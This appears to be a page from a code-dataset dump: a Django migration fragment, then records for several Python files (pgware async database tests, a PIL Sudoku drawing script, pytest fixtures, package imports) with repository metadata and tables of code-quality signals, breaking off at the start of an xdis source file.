model_name='projectschema',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified'),
),
migrations.AddField(
model_name='schema',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created'),
),
migrations.AddField(
model_name='schema',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified'),
),
migrations.AddField(
model_name='submission',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created'),
),
migrations.AddField(
model_name='submission',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified'),
),
]
```

Row 2 stats: avg_line_length 41.144737, max_line_length 135, alphanum_fraction 0.638951, effective 0, hits 9.

| quality signal | `*_quality_signal` value | bare column |
|---|---|---|
| qsc_code_num_words | 300 | 0 |
| qsc_code_num_chars | 3,127 | 0 |
| qsc_code_mean_word_length | 6.526667 | 0 |
| qsc_code_frac_words_unique | 0.156667 | null |
| qsc_code_frac_chars_top_2grams | 0.073034 | 0 |
| qsc_code_frac_chars_top_3grams | 0.126149 | 0 |
| qsc_code_frac_chars_top_4grams | 0.165475 | 1 |
| qsc_code_frac_chars_dupe_5grams | 0.902962 | 1 |
| qsc_code_frac_chars_dupe_6grams | 0.902962 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.835036 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.835036 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.835036 | 1 |
| qsc_code_frac_chars_dupe_10grams | 0.835036 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.013124 | 0 |
| qsc_code_frac_chars_whitespace | 0.244643 | 0 |
| qsc_code_size_file_byte | 3,127 | 0 |
| qsc_code_num_lines | 75 | 0 |
| qsc_code_num_chars_line_max | 136 | 0 |
| qsc_code_num_chars_line_mean | 41.693333 | 0 |
| qsc_code_frac_chars_alphabet | 0.815834 | 0 |
| qsc_code_frac_chars_comments | 0.014391 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.869565 | 1 |
| qsc_code_cate_autogen | 1 | 1 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.102273 | 0 |
| qsc_code_frac_chars_long_word_length | 0.007468 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 0.043478 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 0.086957 | 0 |
| qsc_codepython_frac_lines_print | 0 | 0 |
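
The bare columns (the same names minus the `_quality_signal` suffix) read as 0/1 flags, and in every complete row on this page `hits` equals their sum: 8 raised flags in row 1, and 9 here (top_4grams, the six dupe-n-gram flags, dupe_lines, and autogen). Which thresholds raise each flag is not shown on this page, but the bookkeeping can be checked with a small sketch, assuming a record loaded as a plain dict:

```python
QSC_PREFIXES = ("qsc_code_", "qsc_codepython_")

def check_hits(row: dict) -> bool:
    """Verify that `hits` counts the raised bare flag columns."""
    flags = [
        value for name, value in row.items()
        if name.startswith(QSC_PREFIXES) and not name.endswith("_quality_signal")
    ]
    raised = sum(value == 1 for value in flags)  # null entries count as not raised
    return raised == row["hits"]
```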
**Row 3**

- hexsha: `17331da500b5f038e5a5c373a6d80c1188740383`; size: 72; ext: `py`; lang: Python
- max_stars: path `thundra/plugins/invocation/__init__.py`, repo `sturmianseq/thundra-agent-python`, head `4cee02d790eb7b8e4dea4e2e9dcd1f67533b1c56`, licenses ["Apache-2.0"], count 22, events 2018-03-05T20:02:46.000Z to 2021-04-09T12:00:18.000Z
- max_issues: path, repo, head, and licenses as above; count 13, events 2018-03-26T07:57:57.000Z to 2021-06-29T14:22:52.000Z
- max_forks: path, repo, head, and licenses as above; count 3, events 2018-07-04T19:00:25.000Z to 2020-12-01T11:57:29.000Z

content:

```python
from . import invocation_support
from . import invocation_trace_support
```

Row 3 stats: avg_line_length 24, max_line_length 38, alphanum_fraction 0.861111, effective 0, hits 7.

| quality signal | `*_quality_signal` value | bare column |
|---|---|---|
| qsc_code_num_words | 9 | 1 |
| qsc_code_num_chars | 72 | 0 |
| qsc_code_mean_word_length | 6.555556 | 0 |
| qsc_code_frac_words_unique | 0.555556 | null |
| qsc_code_frac_chars_top_2grams | 0.338983 | 1 |
| qsc_code_frac_chars_top_3grams | 0.677966 | 1 |
| qsc_code_frac_chars_top_4grams | 0 | 0 |
| qsc_code_frac_chars_dupe_5grams | 0 | 0 |
| qsc_code_frac_chars_dupe_6grams | 0 | 0 |
| qsc_code_frac_chars_dupe_7grams | 0 | 0 |
| qsc_code_frac_chars_dupe_8grams | 0 | 0 |
| qsc_code_frac_chars_dupe_9grams | 0 | 0 |
| qsc_code_frac_chars_dupe_10grams | 0 | 0 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0 | 0 |
| qsc_code_frac_chars_whitespace | 0.111111 | 0 |
| qsc_code_size_file_byte | 72 | 0 |
| qsc_code_num_lines | 2 | 1 |
| qsc_code_num_chars_line_max | 39 | 0 |
| qsc_code_num_chars_line_mean | 36 | 0 |
| qsc_code_frac_chars_alphabet | 0.921875 | 0 |
| qsc_code_frac_chars_comments | 0 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0 | 0 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0 | 0 |
| qsc_code_frac_chars_long_word_length | 0 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0 | 0 |
| qsc_codepython_cate_var_zero | true | 1 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 1 | 1 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 1 | 1 |
| qsc_codepython_frac_lines_print | 0 | 0 |
**Row 4**

- hexsha: `178c5f88c150784b1be1c10c3ea1132a6732d1a4`; size: 13,499; ext: `py`; lang: Python
- max_stars: path `tests/test_pgware_async.py`, repo `PieterjanMontens/pgware`, head `c8bab60810ac6916aae01f7343e7c5149d4a79a0`, licenses ["MIT"], count 1, events 2020-06-11T08:31:55.000Z to 2020-06-11T08:31:55.000Z
- max_issues: path, repo, head, and licenses as above; count 4, events 2020-03-24T17:17:28.000Z to 2021-06-02T00:16:44.000Z
- max_forks: path, repo, head, and licenses as above; count null, event datetimes null

content:

```python
# pylint: skip-file
import pytest
import pgware as pgware
pytestmark = pytest.mark.asyncio
def pytest_generate_tests(metafunc):
if 'db_cfg' in metafunc.fixturenames:
metafunc.parametrize('db_cfg', ['asyncpg', 'psycopg2'], indirect=True)
@pytest.fixture
def db_cfg(request):
return {
'client': request.param,
'database': '[DB]',
'user': '[USER]',
'password': None,
'host': '[HOST]',
'port': None,
'connection_type': 'single',
}
async def test_single_connect(db_cfg, event_loop):
pgw = pgware.build(output='dict', **db_cfg)
assert(pgw.backend == db_cfg['client'])
async def test_preheat(db_cfg, event_loop):
pgw = pgware.build(output='dict', **db_cfg)
await pgw.preheat_async()
async with pgw.get_connection().cursor():
pass
async def test_cursor(db_cfg, event_loop):
pgw = pgware.build(output='dict', **db_cfg)
async with pgw.get_connection().cursor():
pass
async def test_close(db_cfg, event_loop):
pgw = pgware.build(output='dict', **db_cfg)
async with pgw.get_connection() as conn:
conn.close()
async def test_close_all(db_cfg, event_loop):
pgw = pgware.build(output='dict', **db_cfg)
async with pgw.get_connection():
pass
await pgw.close_all()
async def test_cursor_query_async(db_cfg, event_loop):
pgw = pgware.build(output='dict', **db_cfg)
async with pgw.get_connection().cursor() as cur:
await cur.execute('select 1')
result = await cur.fetchone()
assert(1 == result['?column?'])
async with pgw.get_connection().cursor() as cur:
await cur.execute('select 2')
result = await cur.fetchone()
assert(2 == result['?column?'])
async def test_query_async(db_cfg, event_loop):
pgw = pgware.build(output='dict', **db_cfg)
async with pgw.get_connection() as cur:
result = await cur.fetchone('select 1')
assert(1 == result['?column?'])
async def test_psycogp2_syntax(db_cfg, event_loop):
pgw = pgware.build(output='dict', param_format='psycopg2', **db_cfg)
async with pgw.get_connection() as pg:
result = await pg.fetchone('select %s as one, %s as two', ('pouly', 'croc'))
assert('pouly' == result['one'])
assert('croc' == result['two'])
async with pgw.get_connection() as pg:
result = await pg.fetchone(
'select %(qui)s as one, %(quoi)s as two',
{'quoi': 'pouly', 'qui': 'croc'}
)
assert('croc' == result['one'])
assert('pouly' == result['two'])
async def test_asyncpg_syntax(db_cfg, event_loop):
pgw = pgware.build(output='dict', param_format='postgresql', **db_cfg)
async with pgw.get_connection() as pg:
result = await pg.fetchone('select $1 as one, $2 as two', ('pouly', 'croc'))
assert('pouly' == result['one'])
assert('croc' == result['two'])
result = await pg.fetchone('select $2 as one, $1 as two', ('pouly', 'croc'))
assert('croc' == result['one'])
assert('pouly' == result['two'])
async def test_json_querying(db_cfg, event_loop):
pgw = pgware.build(output='dict', param_format='postgresql', **db_cfg)
async with pgw.get_connection() as pg:
result = await pg.fetchone(
'select $1::jsonb as json',
({'sauce': "andalouse"},))
assert('andalouse' == result['json']['sauce'])
result = await pg.fetchone(
'select $1::jsonb as json',
(['andalouse'],))
assert('andalouse' == result['json'][0])
async def test_prepared_cursor_query_params_postgresql(db_cfg, event_loop):
pgw = pgware.build(output='dict', param_format='postgresql', **db_cfg)
async with pgw.get_connection().cursor() as conn:
stmt = await conn.prepare('select $1 as one, $2 as two')
await stmt.execute(('pouly', 'croc'))
result = await stmt.fetchone()
assert('pouly' == result['one'])
assert('croc' == result['two'])
await stmt.execute(('mexi', 'canos'))
result = await stmt.fetchone()
assert('mexi' == result['one'])
assert('canos' == result['two'])
async def test_prepared_query_params_postgresql(db_cfg, event_loop):
pgw = pgware.build(output='dict', param_format='postgresql', **db_cfg)
async with pgw.get_connection() as conn:
stmt = await conn.prepare('select $1 as one, $2 as two')
result = await stmt.fetchone(('frites', 'mayo'))
assert('frites' == result['one'])
assert('mayo' == result['two'])
result = await stmt.fetchone(('frites', 'ketchup'))
assert('frites' == result['one'])
assert('ketchup' == result['two'])
async def test_prepared_query_params_psycopg2(db_cfg, event_loop):
pgw = pgware.build(output='dict', param_format='psycopg2', **db_cfg)
async with pgw.get_connection() as conn:
stmt = await conn.prepare('select %s as one, %s as two')
result = await stmt.fetchone(('frites', 'mayo'))
assert('frites' == result['one'])
assert('mayo' == result['two'])
result = await stmt.fetchone(('frites', 'ketchup'))
assert('frites' == result['one'])
assert('ketchup' == result['two'])
async def test_public_methods(db_cfg, event_loop):
pgw = pgware.build(output='dict', param_format='postgresql', **db_cfg)
# Test all methods in all possible combinations
async with pgw.get_connection() as cur:
await cur.executemany('SELECT $1 as one, $2 as two', [('frites', 'ketchup'), ('frites', 'moutarde')])
async with pgw.get_connection().cursor() as cur:
result = await cur.fetchval('select \'mayo\' as one')
assert result == 'mayo'
await cur.execute('select \'mexicanos\' as one')
result = await cur.fetchval()
assert result == 'mexicanos'
stmt = await cur.prepare('select $1 as one, $2 as two')
result = await stmt.fetchval(('frites', 'mayo'))
assert result == 'frites'
result = await cur.fetchval('select $1 as one', ('ketchup',))
assert result == 'ketchup'
await cur.execute('select \'fricadelle\' as one')
result = await cur.fetchval()
assert result == 'fricadelle'
async with pgw.get_connection() as cur:
result = await cur.fetchval('select \'mayo\' as one')
assert result == 'mayo'
await cur.execute('select \'mexicanos\' as one')
stmt = await cur.prepare('select $1 as one, $2 as two')
result = await stmt.fetchval(('frites', 'mayo'))
assert result == 'frites'
result = await cur.fetchval('select $1 as one', ('ketchup',))
assert result == 'ketchup'
await cur.execute('select \'fricadelle\' as one')
async with pgw.get_connection().cursor() as cur:
result = await cur.fetchone('select \'mayo\' as one')
assert result['one'] == 'mayo'
await cur.execute('select \'mexicanos\' as one')
result = await cur.fetchone()
assert result['one'] == 'mexicanos'
stmt = await cur.prepare('select $1 as one, $2 as two')
result = await stmt.fetchone(('frites', 'mayo'))
assert result['one'] == 'frites'
result = await cur.fetchone('select $1 as one', ('ketchup',))
assert result['one'] == 'ketchup'
await cur.execute('select \'fricadelle\' as one')
result = await cur.fetchone()
assert result['one'] == 'fricadelle'
async with pgw.get_connection() as cur:
result = await cur.fetchone('select \'mayo\' as one')
assert result['one'] == 'mayo'
stmt = await cur.prepare('select $1 as one, $2 as two')
result = await stmt.fetchone(('frites', 'mayo'))
assert result['one'] == 'frites'
result = await cur.fetchone('select $1 as one', ('ketchup',))
assert result['one'] == 'ketchup'
async with pgw.get_connection().cursor() as cur:
result = await cur.fetchall('select \'mayo\' as one')
assert result[0]['one'] == 'mayo'
await cur.execute('select \'mexicanos\' as one')
result = await cur.fetchall()
assert result[0]['one'] == 'mexicanos'
stmt = await cur.prepare('select $1 as one, $2 as two')
result = await stmt.fetchall(('frites', 'mayo'))
assert result[0]['one'] == 'frites'
result = await cur.fetchall('select $1 as one', ('ketchup',))
assert result[0]['one'] == 'ketchup'
await cur.execute('select \'fricadelle\' as one')
result = await cur.fetchall()
assert result[0]['one'] == 'fricadelle'
async with pgw.get_connection() as cur:
result = await cur.fetchall('select \'mayo\' as one')
assert result[0]['one'] == 'mayo'
stmt = await cur.prepare('select $1 as one, $2 as two')
result = await stmt.fetchall(('frites', 'mayo'))
assert result[0]['one'] == 'frites'
result = await cur.fetchall('select $1 as one', ('ketchup',))
assert result[0]['one'] == 'ketchup'
await pgw.close_all()
async def test_dict_outputs(db_cfg, event_loop):
pgw = pgware.build(output='dict', param_format='postgresql', **db_cfg)
async with pgw.get_connection() as pgw:
await pgw.execute("""
CREATE TEMPORARY TABLE pgware_test (
one varchar(50),
two int,
three boolean
)
""")
await pgw.execute("INSERT INTO pgware_test VALUES ('pgware', 2, TRUE)")
result = await pgw.fetchone("SELECT * FROM pgware_test")
assert(isinstance(result, dict))
assert(result['one'] == 'pgware')
assert(result['two'] == 2)
assert(result['three'] is True)
result = await pgw.fetchall("SELECT * FROM pgware_test")
assert(isinstance(result[0], dict))
assert(result[0]['one'] == 'pgware')
assert(result[0]['two'] == 2)
assert(result[0]['three'] is True)
result = await pgw.fetchval("SELECT * FROM pgware_test")
assert(result == 'pgware')
async def test_list_outputs(db_cfg, event_loop):
pgw = pgware.build(output='list', param_format='postgresql', **db_cfg)
async with pgw.get_connection() as pgw:
await pgw.execute("""
CREATE TEMPORARY TABLE pgware_test (
one varchar(50),
two int,
three boolean
)
""")
await pgw.execute("INSERT INTO pgware_test VALUES ('pgware', 2, TRUE)")
result = await pgw.fetchone("SELECT * FROM pgware_test")
assert(isinstance(result, list))
assert(result[0] == 'pgware')
assert(result[1] == 2)
assert(result[2] is True)
result = await pgw.fetchall("SELECT * FROM pgware_test")
assert(isinstance(result, list))
assert(isinstance(result[0], list))
assert(result[0][0] == 'pgware')
assert(result[0][1] == 2)
assert(result[0][2] is True)
result = await pgw.fetchval("SELECT * FROM pgware_test")
assert(result == 'pgware')
async def test_native_outputs(db_cfg, event_loop):
pgw = pgware.build(output='native', param_format='postgresql', **db_cfg)
# Both native formats allow access to values by index or by name
async with pgw.get_connection() as pgw:
await pgw.execute("""
CREATE TEMPORARY TABLE pgware_test (
one varchar(50),
two int,
three boolean
)
""")
await pgw.execute("INSERT INTO pgware_test VALUES ('pgware', 2, TRUE)")
result = await pgw.fetchone("SELECT * FROM pgware_test")
assert(result[0] == 'pgware')
assert(result[1] == 2)
assert(result[2] is True)
assert(result['one'] == 'pgware')
assert(result['two'] == 2)
assert(result['three'] is True)
result = await pgw.fetchall("SELECT * FROM pgware_test")
assert(result[0][0] == 'pgware')
assert(result[0][1] == 2)
assert(result[0][2] is True)
assert(result[0]['one'] == 'pgware')
assert(result[0]['two'] == 2)
assert(result[0]['three'] is True)
result = await pgw.fetchval("SELECT * FROM pgware_test")
assert(result == 'pgware')
async def test_iterator(db_cfg, event_loop):
pgw = pgware.build(output='dict', param_format='postgresql', **db_cfg)
# Both native formats allow access to values by index or by name
async with pgw.get_connection().cursor() as cur:
await cur.execute("""
CREATE TEMPORARY TABLE pgware_test (
one varchar(50),
two int,
three boolean
)
""")
await cur.execute("INSERT INTO pgware_test VALUES ('pgware', 2, TRUE)")
await cur.execute("INSERT INTO pgware_test VALUES ('pgloop', 3, FALSE)")
await cur.fetchall("SELECT * FROM pgware_test")
out = []
async for row in cur:
out.append(row)
print(row)
print(out)
assert out[0]['one'] == 'pgware'
assert out[1]['one'] == 'pgloop'
await cur.execute("INSERT INTO pgware_test VALUES ('pglimp', 4, FALSE)")
await cur.execute("SELECT * FROM pgware_test")
out = []
async for row in cur:
out.append(row)
print(row)
assert out[0]['one'] == 'pgware'
assert out[1]['one'] == 'pgloop'
assert out[2]['one'] == 'pglimp'
```

Row 4 stats: avg_line_length 35.153646, max_line_length 109, alphanum_fraction 0.593229, effective 0, hits 8.

| quality signal | `*_quality_signal` value | bare column |
|---|---|---|
| qsc_code_num_words | 1,692 | 0 |
| qsc_code_num_chars | 13,499 | 0 |
| qsc_code_mean_word_length | 4.637707 | 0 |
| qsc_code_frac_words_unique | 0.083333 | null |
| qsc_code_frac_chars_top_2grams | 0.077992 | 0 |
| qsc_code_frac_chars_top_3grams | 0.038231 | 0 |
| qsc_code_frac_chars_top_4grams | 0.047789 | 0 |
| qsc_code_frac_chars_dupe_5grams | 0.890022 | 1 |
| qsc_code_frac_chars_dupe_6grams | 0.853192 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.853065 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.8379 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.810883 | 1 |
| qsc_code_frac_chars_dupe_10grams | 0.779406 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.010205 | 0 |
| qsc_code_frac_chars_whitespace | 0.252315 | 0 |
| qsc_code_size_file_byte | 13,499 | 0 |
| qsc_code_num_lines | 383 | 0 |
| qsc_code_num_chars_line_max | 110 | 0 |
| qsc_code_num_chars_line_mean | 35.245431 | 0 |
| qsc_code_frac_chars_alphabet | 0.767264 | 0 |
| qsc_code_frac_chars_comments | 0.014001 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.717687 | 1 |
| qsc_code_cate_autogen | 1 | 1 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.229688 | 0 |
| qsc_code_frac_chars_long_word_length | 0 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0.295918 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0.006803 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0.013605 | 0 |
| qsc_codepython_frac_lines_import | 0.006803 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0.003401 | 0 |
| qsc_codepython_score_lines_no_logic | 0.017007 | 0 |
| qsc_codepython_frac_lines_print | 0.010204 | 0 |
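
qsc_code_frac_lines_dupe_lines_quality_signal is 0.717687 for this row, which fits a test file built from heavily repeated blocks. Reading the name at face value (again, the dataset's own implementation is not shown here), a plausible sketch counts the share of non-blank lines whose text occurs more than once:

```python
from collections import Counter

def frac_lines_dupe_lines(content: str) -> float:
    """Hypothetical reading: share of non-blank lines that are duplicated."""
    lines = [line.strip() for line in content.splitlines() if line.strip()]
    counts = Counter(lines)
    dupes = sum(1 for line in lines if counts[line] > 1)
    return dupes / len(lines) if lines else 0.0
```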
**Row 5**

- hexsha: `bdd934d6f1c7ad566e454e694343d565177024f3`; size: 1,737; ext: `py`; lang: Python
- max_stars: path `Draw.py`, repo `Hasnae-bouhmady/Sudoku-Solver-machine-learning`, head `9cf967d274df24ba473c12134f7d91ffbd3637bc`, licenses ["MIT"], count 3, events 2021-12-12T23:26:23.000Z to 2022-02-02T20:43:56.000Z
- max_issues: path, repo, head, and licenses as above; count null, event datetimes null
- max_forks: path, repo, head, and licenses as above; count 1, events 2021-12-12T23:30:13.000Z to 2021-12-12T23:30:13.000Z

content:

```python
from PIL import Image, ImageDraw
from PIL import ImageFont
def draw(puzzle,solution):
im = Image.new('RGBA', (900, 900), (255, 255, 255, 255))
draw = ImageDraw.Draw(im)
for i in range(4):
draw.line((i*300,0,i*300,900), (0,0,0,255),5)
draw.line((0,i*300,900,i*300), (0,0,0,255),5)
for j in range(2):
draw.line((i * 300+(j+1)*100, 0, i * 300 + (j+1)*100, 900), (0, 0, 0, 255), 2)
draw.line((0,i * 300 + (j + 1) * 100,900, i * 300 + (j + 1) * 100), (0, 0, 0, 255),2)
font = ImageFont.truetype(r'C:\Users\System-Pc\Desktop\arial.ttf', 50)
for i in range(9):
for j in range(9):
if puzzle[j][i] != 0 :
draw.text((i*100+35,j*100+25),str(puzzle[j][i]), fill =(0,0,0,255),font = font,align="center")
else:
draw.text((i * 100 + 35, j * 100 + 25), str(solution[j][i]), fill=(122, 0, 0, 255), font=font,align="center")
im.show()
def draw1(puzzle):
im = Image.new('RGBA', (900, 900), (255, 255, 255, 255))
draw = ImageDraw.Draw(im)
for i in range(4):
draw.line((i*300,0,i*300,900), (0,0,0,255),5)
draw.line((0,i*300,900,i*300), (0,0,0,255),5)
for j in range(2):
draw.line((i * 300+(j+1)*100, 0, i * 300 + (j+1)*100, 900), (0, 0, 0, 255), 2)
draw.line((0,i * 300 + (j + 1) * 100,900, i * 300 + (j + 1) * 100), (0, 0, 0, 255),2)
font = ImageFont.truetype(r'C:\Users\System-Pc\Desktop\arial.ttf', 50)
for i in range(9):
for j in range(9):
if puzzle[j][i] != 0 :
draw.text((i*100+35,j*100+25),str(puzzle[j][i]), fill =(0,0,0,255),font = font,align="center")
im.show()
```

Row 5 stats: avg_line_length 44.538462, max_line_length 126, alphanum_fraction 0.498561, effective 0, hits 9.

| quality signal | `*_quality_signal` value | bare column |
|---|---|---|
| qsc_code_num_words | 314 | 0 |
| qsc_code_num_chars | 1,737 | 0 |
| qsc_code_mean_word_length | 2.757962 | 0 |
| qsc_code_frac_words_unique | 0.165605 | null |
| qsc_code_frac_chars_top_2grams | 0.048499 | 0 |
| qsc_code_frac_chars_top_3grams | 0.06351 | 0 |
| qsc_code_frac_chars_top_4grams | 0.069284 | 0 |
| qsc_code_frac_chars_dupe_5grams | 0.878753 | 1 |
| qsc_code_frac_chars_dupe_6grams | 0.878753 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.878753 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.878753 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.878753 | 1 |
| qsc_code_frac_chars_dupe_10grams | 0.810624 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.214685 | 1 |
| qsc_code_frac_chars_whitespace | 0.278641 | 0 |
| qsc_code_size_file_byte | 1,737 | 0 |
| qsc_code_num_lines | 38 | 0 |
| qsc_code_num_chars_line_max | 127 | 0 |
| qsc_code_num_chars_line_mean | 45.710526 | 0 |
| qsc_code_frac_chars_alphabet | 0.476457 | 1 |
| qsc_code_frac_chars_comments | 0 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.823529 | 1 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.057715 | 0 |
| qsc_code_frac_chars_long_word_length | 0.042403 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0.058824 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 0.058824 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 0.117647 | 0 |
| qsc_codepython_frac_lines_print | 0 | 0 |
**Row 6**

- hexsha: `da89047413ad2042a10b92f2f2b3efe7e14a6f61`; size: 123; ext: `py`; lang: Python
- max_stars: path `tests/conftest.py`, repo `pactfi/pact-py-sdk`, head `139ad7016b852cf971cb3af555a5229b5f373298`, licenses ["MIT"], count 6, events 2022-02-21T11:58:35.000Z to 2022-02-24T08:03:58.000Z
- max_issues: path, repo, head, and licenses as above; count 1, events 2022-02-22T10:46:35.000Z to 2022-02-22T11:13:00.000Z
- max_forks: path, repo, head, and licenses as above; count null, event datetimes null

content:

```python
import pytest
from tests.utils import make_fresh_testbed
@pytest.fixture
def testbed():
return make_fresh_testbed()
```

Row 6 stats: avg_line_length 13.666667, max_line_length 42, alphanum_fraction 0.788618, effective 0, hits 7.

| quality signal | `*_quality_signal` value | bare column |
|---|---|---|
| qsc_code_num_words | 17 | 1 |
| qsc_code_num_chars | 123 | 0 |
| qsc_code_mean_word_length | 5.470588 | 0 |
| qsc_code_frac_words_unique | 0.647059 | null |
| qsc_code_frac_chars_top_2grams | 0.193548 | 0 |
| qsc_code_frac_chars_top_3grams | 0.344086 | 1 |
| qsc_code_frac_chars_top_4grams | 0 | 0 |
| qsc_code_frac_chars_dupe_5grams | 0 | 0 |
| qsc_code_frac_chars_dupe_6grams | 0 | 0 |
| qsc_code_frac_chars_dupe_7grams | 0 | 0 |
| qsc_code_frac_chars_dupe_8grams | 0 | 0 |
| qsc_code_frac_chars_dupe_9grams | 0 | 0 |
| qsc_code_frac_chars_dupe_10grams | 0 | 0 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0 | 0 |
| qsc_code_frac_chars_whitespace | 0.146341 | 0 |
| qsc_code_size_file_byte | 123 | 0 |
| qsc_code_num_lines | 8 | 1 |
| qsc_code_num_chars_line_max | 43 | 0 |
| qsc_code_num_chars_line_mean | 15.375 | 0 |
| qsc_code_frac_chars_alphabet | 0.885714 | 0 |
| qsc_code_frac_chars_comments | 0 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0 | 0 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0 | 0 |
| qsc_code_frac_chars_long_word_length | 0 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0.2 | 0 |
| qsc_codepython_cate_var_zero | true | 1 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 0.4 | 1 |
| qsc_codepython_frac_lines_simplefunc | 0.2 | 1 |
| qsc_codepython_score_lines_no_logic | 0.8 | 1 |
| qsc_codepython_frac_lines_print | 0 | 0 |
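
The qsc_codepython_frac_lines_* signals behave as plain line fractions, and the five-line conftest.py above bears this out: 2 of 5 lines are imports (0.4), 1 of 5 is a `def` (0.2), and none is a bare `pass` (0). A sketch under that reading, verified only against this row (the pgware row above hints that `async def` lines are not counted as functions):

```python
def line_fraction_signals(content: str) -> dict:
    """Line-fraction signals inferred from their names; checked against the
    conftest.py row above (5 lines: 2 imports -> 0.4, 1 def -> 0.2, 0 pass)."""
    lines = [line.strip() for line in content.splitlines() if line.strip()]
    n = len(lines)
    return {
        "qsc_codepython_frac_lines_import": sum(
            line.startswith(("import ", "from ")) for line in lines) / n,
        "qsc_codepython_frac_lines_func_ratio": sum(
            line.startswith("def ") for line in lines) / n,
        "qsc_codepython_frac_lines_pass": sum(line == "pass" for line in lines) / n,
    }
```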
**Row 7**

- hexsha: `16ff78cd1526af5ce49403f57c5b724cf8e579d0`; size: 20,710; ext: `py`; lang: Python
- max_stars: path `S4/S4 Decompiler/Old Libraries/xdis/code.py`, repo `NeonOcean/Environment`, head `ca658cf66e8fd6866c22a4a0136d415705b36d26`, licenses ["CC-BY-4.0"], count 1, events 2021-05-20T19:33:37.000Z to 2021-05-20T19:33:37.000Z
- max_issues: path, repo, head, and licenses as above; count null, event datetimes null
- max_forks: path, repo, head, and licenses as above; count null, event datetimes null

content:

```python
# (C) Copyright 2017-2019 by Rocky Bernstein
#
# This program is free software; you can redistribute it and/or
